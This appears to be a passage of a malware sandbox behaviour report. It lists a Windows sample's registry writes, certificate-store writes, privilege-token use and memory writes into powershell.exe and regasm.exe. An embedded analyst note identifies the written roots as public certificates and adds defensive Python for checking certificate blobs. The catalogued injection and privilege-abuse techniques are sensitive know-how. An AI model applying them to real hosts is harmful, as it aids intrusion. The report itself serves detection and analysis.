Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-212 = "Pacific Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-81 = "Atlantic Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-392 = "Arab Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1022 = "Bangladesh Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-32 = "Mid-Atlantic Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-681 = "E. Australia Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-222 = "Alaskan Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-461 = "Afghanistan Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-262 = "GMT Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-511 = "Central Asia Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-291 = "Central European Daylight Time" C:\Windows\windefender.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = [blob data omitted] C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = [blob data omitted] C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = [blob data omitted] C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Windows\rss\csrss.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = [blob data omitted] C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 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 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 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 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 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 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 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 C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 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 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
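
Writes to SystemCertificates\ROOT and \AuthRoot look like trust-store poisoning, but the key names and blob contents above identify well-known public roots rather than an attacker CA: DF3C24F9... is DigiCert Global Root G2 (the subject CN is readable in the DER as 44 69 67 69 43 65 72 74 ... "DigiCert Global Root G2"), DAC9024F... is DST Root CA X3 (subject "DST Root CA X3", validity 2000-09-30 to 2021-09-30 in the same hex), D4DE20D0... is Baltimore CyberTrust Root and CABD2A79... is ISRG Root X1. Together with the apps.identrust.com fetches and the CryptnetUrlCache files listed later in this report, this is consistent with CryptoAPI's automatic root update caching roots while patch.exe and regasm.exe validated a certificate chain, which is a side effect of the malware's activity, not the mechanism. The check that settles the question for any such event is to pull the certificate out of the blob, read its subject, and confirm its SHA-1 matches the key it was written under; an unrecognised subject, or a thumbprint that does not match the key name, is what warrants escalation. The blob layout is a sequence of CryptoAPI property records (DWORD property id, DWORD reserved = 1, DWORD length, data): in the DF3C24F9 blob the first record (id 0x0f) is the signature hash, the second (id 0x03) is the 20-byte SHA-1 that equals the key name, and the third (id 0x20, length 0x392 = 914) is the DER certificate starting 30 82 03 8e. The following Python is an added example of mine, not tooling from the sandbox or the report: parse_cert_blob walks those records, subject_cn is a minimal DER walk that assumes a well-formed certificate, and build_sample_blob constructs an unsigned throwaway certificate shell purely to exercise the parser offline.

```python
import hashlib
import struct

# Property IDs from wincrypt.h that appear in SystemCertificates\...\Certificates\<thumbprint>\Blob values
CERT_SHA1_HASH_PROP_ID = 3
CERT_SIGNATURE_HASH_PROP_ID = 15
CERT_CERT_PROP_ID = 32              # record that carries the DER-encoded certificate itself
OID_COMMON_NAME = b"\x55\x04\x03"   # id-at-commonName, 2.5.4.3


def parse_cert_blob(blob: bytes) -> dict:
    """Split a Blob value into {prop_id: data} by walking its (prop_id, reserved=1, length, data) records."""
    props, off = {}, 0
    while off + 12 <= len(blob):
        prop_id, reserved, length = struct.unpack_from("<III", blob, off)
        off += 12
        data = blob[off:off + length]
        if reserved != 1 or len(data) != length:
            raise ValueError(f"malformed property record at offset {off - 12}")
        props[prop_id] = data
        off += length
    if off != len(blob):
        raise ValueError("trailing bytes after the last property record")
    return props


def _tlv(buf: bytes, off: int):
    """Decode one DER tag/length at off; return (tag, value_start, value_end)."""
    tag, length = buf[off], buf[off + 1]
    off += 2
    if length & 0x80:                       # long form: low 7 bits give the number of length bytes
        n = length & 0x7F
        length = int.from_bytes(buf[off:off + n], "big")
        off += n
    return tag, off, off + length


def _children(buf: bytes, start: int, end: int):
    """Yield the TLVs contained in a constructed value spanning [start, end)."""
    off = start
    while off < end:
        tag, vs, ve = _tlv(buf, off)
        yield tag, vs, ve
        off = ve


def subject_cn(der: bytes) -> str:
    """Return the subject commonName of an X.509 DER certificate (assumes a well-formed certificate)."""
    _, cert_s, _ = _tlv(der, 0)                 # Certificate ::= SEQUENCE
    _, tbs_s, tbs_e = _tlv(der, cert_s)         # tbsCertificate ::= SEQUENCE
    fields = list(_children(der, tbs_s, tbs_e))
    if fields[0][0] == 0xA0:                    # optional [0] EXPLICIT version
        fields = fields[1:]
    _, subj_s, subj_e = fields[4]               # serialNumber, signature, issuer, validity, subject
    for _, set_s, set_e in _children(der, subj_s, subj_e):          # RelativeDistinguishedName SETs
        for _, atv_s, atv_e in _children(der, set_s, set_e):        # AttributeTypeAndValue SEQUENCEs
            (_, oid_s, oid_e), (_, val_s, val_e) = list(_children(der, atv_s, atv_e))[:2]
            if der[oid_s:oid_e] == OID_COMMON_NAME:
                return der[val_s:val_e].decode("utf-8", "replace")
    return ""


def check_root_blob(key_thumbprint_hex: str, blob_hex: str) -> dict:
    """Identify the certificate in a Blob value and confirm it matches the registry key it was written under."""
    props = parse_cert_blob(bytes.fromhex(blob_hex))
    der = props.get(CERT_CERT_PROP_ID)
    if der is None:
        raise ValueError("no CERT_CERT_PROP_ID record: this Blob does not hold a certificate")
    sha1 = hashlib.sha1(der).hexdigest()
    return {
        "subject_cn": subject_cn(der),
        "sha1": sha1,
        "sha256": hashlib.sha256(der).hexdigest(),
        "thumbprint_matches_key": sha1 == key_thumbprint_hex.lower(),
        "sha1_prop_matches": props.get(CERT_SHA1_HASH_PROP_ID) == bytes.fromhex(sha1),
        "property_ids": sorted(props),
    }


def _der(tag: int, body: bytes) -> bytes:
    """Encode one DER TLV (used only to build the constructed sample below)."""
    if len(body) < 0x80:
        return bytes([tag, len(body)]) + body
    lb = len(body).to_bytes((len(body).bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + body


def build_sample_blob(cn: str):
    """Constructed sample: an unsigned, untrusted X.509 shell wrapped as a Blob. Returns (thumbprint, blob_hex)."""
    name = _der(0x30, _der(0x31, _der(0x30, _der(0x06, OID_COMMON_NAME) + _der(0x13, cn.encode()))))
    alg = _der(0x30, _der(0x06, bytes.fromhex("2a864886f70d01010b")))   # sha256WithRSAEncryption
    validity = _der(0x30, _der(0x17, b"240101000000Z") + _der(0x17, b"340101000000Z"))
    spki = _der(0x30, alg + _der(0x03, b"\x00\x00"))
    tbs = _der(0x30, _der(0xA0, _der(0x02, b"\x02")) + _der(0x02, b"\x01") + alg + name + validity + name + spki)
    der = _der(0x30, tbs + alg + _der(0x03, b"\x00\x00"))
    sha1 = hashlib.sha1(der).digest()
    records = ((CERT_SHA1_HASH_PROP_ID, sha1), (CERT_CERT_PROP_ID, der))
    blob = b"".join(struct.pack("<III", pid, 1, len(d)) + d for pid, d in records)
    return sha1.hex().upper(), blob.hex()
```

To run it against this report, paste the hex after "Blob = " into check_root_blob together with the thumbprint from the key path; on a live host the same value is read from HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\<thumbprint>\Blob, and certutil -store Root lists the store for comparison. The parser deliberately refuses blobs with malformed records or trailing bytes rather than guessing, since a hand-crafted blob is exactly the case where guessing would hide the anomaly.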

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Pictures\8ZqLGNH2YJDVFBCte8UAV3l8.exe N/A
N/A N/A C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe N/A
N/A N/A C:\Users\Admin\Pictures\1zxDwRKfAb5DhSaC0THw4Vwu.exe N/A
N/A N/A C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe N/A
N/A N/A C:\Users\Admin\Pictures\1zxDwRKfAb5DhSaC0THw4Vwu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u8k.0.exe N/A
N/A N/A C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
N/A N/A C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
N/A N/A C:\Users\Admin\Pictures\8ZqLGNH2YJDVFBCte8UAV3l8.exe N/A
N/A N/A C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
N/A N/A C:\Users\Admin\Pictures\8ZqLGNH2YJDVFBCte8UAV3l8.exe N/A
N/A N/A C:\Users\Admin\Pictures\8ZqLGNH2YJDVFBCte8UAV3l8.exe N/A
N/A N/A C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
N/A N/A C:\Users\Admin\Pictures\8ZqLGNH2YJDVFBCte8UAV3l8.exe N/A
N/A N/A C:\Users\Admin\Pictures\8ZqLGNH2YJDVFBCte8UAV3l8.exe N/A
N/A N/A C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
N/A N/A C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe N/A
N/A N/A C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe N/A
N/A N/A C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe N/A
N/A N/A C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe N/A
N/A N/A C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe N/A
N/A N/A C:\Users\Admin\Pictures\1zxDwRKfAb5DhSaC0THw4Vwu.exe N/A
N/A N/A C:\Users\Admin\Pictures\1zxDwRKfAb5DhSaC0THw4Vwu.exe N/A
N/A N/A C:\Users\Admin\Pictures\1zxDwRKfAb5DhSaC0THw4Vwu.exe N/A
N/A N/A C:\Users\Admin\Pictures\1zxDwRKfAb5DhSaC0THw4Vwu.exe N/A
N/A N/A C:\Users\Admin\Pictures\1zxDwRKfAb5DhSaC0THw4Vwu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\8ZqLGNH2YJDVFBCte8UAV3l8.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\1zxDwRKfAb5DhSaC0THw4Vwu.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\8ZqLGNH2YJDVFBCte8UAV3l8.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\1zxDwRKfAb5DhSaC0THw4Vwu.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\1zxDwRKfAb5DhSaC0THw4Vwu.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\1zxDwRKfAb5DhSaC0THw4Vwu.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\rss\csrss.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2872 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2872 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2872 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2872 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 2872 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 2872 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 2872 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 2872 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 2872 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 2872 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 2872 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 2872 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 2872 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 2872 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 2872 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 2872 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe C:\Windows\system32\WerFault.exe
PID 2872 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe C:\Windows\system32\WerFault.exe
